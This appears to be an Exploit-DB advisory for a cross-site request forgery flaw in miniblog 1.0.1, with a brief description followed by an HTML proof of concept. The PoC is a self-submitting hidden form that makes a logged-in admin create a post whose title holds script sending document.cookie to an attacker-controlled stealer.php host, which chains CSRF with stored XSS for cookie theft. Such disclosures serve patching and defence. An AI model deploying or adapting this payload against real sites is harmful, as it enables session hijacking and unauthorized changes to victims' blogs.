miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)

2016-10-09T00:00:00
ID EDB-ID:40480
Type exploitdb
Reporter Besim
Modified 2016-10-09T00:00:00

Description

miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post). Webapps exploit for PHP platform

                                        
                                            # Exploit Title :              miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)
# Author :                     Besim
# Google Dork :                
# Date :                       09/10/2016
# Type :                       webapps
# Platform :                   PHP
# Vendor Homepage :  http://www.spyka.net/scripts/php/miniblog
# Software link :
http://dl.spyka.co.uk/scripts/php/miniblog-1-0-1.zip


Description (admin login required) : 

miniblog 1.0.1 versions is vulnerable to CSRF attack, adding, delete and
edit article in the sections

Vulnerable page : http://localhost:8081/miniblog/*adm/admin.php?mode=add

Dangerous point : if used with XSS can be steal on the admin's cookie information.


*############### CSRF PoC ###############*


<html> <!-- CSRF PoC --> <body> <form action="
http://localhost:8081/miniblog/adm/admin.php?mode=add&id=%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Undefined%20variable:%20post%20in%20%3Cb%3EC:\xampp\htdocs\miniblog\adm\edit.php%3C/b%3E%20on%20line%20%3Cb%3E8%3C/b%3E%3Cbr%20/%3E"
method="POST"> <input type="hidden" name="data[post_title]"
value="<script>location.href = ‘http://www.attackersite.com/stealer.php?cookie=’+document.cookie&#59;</script>"
/> <input type="hidden" name="data[post_content]"
value="tester" /> <input type="hidden" name="data[published]"
value="1" /> <input type="hidden" name="miniblog_PostBack" value="Add"
/> <input type="submit" value="Submit request" /> </form> <script>
document.forms[0].submit(); </script> </body> </html>



########################################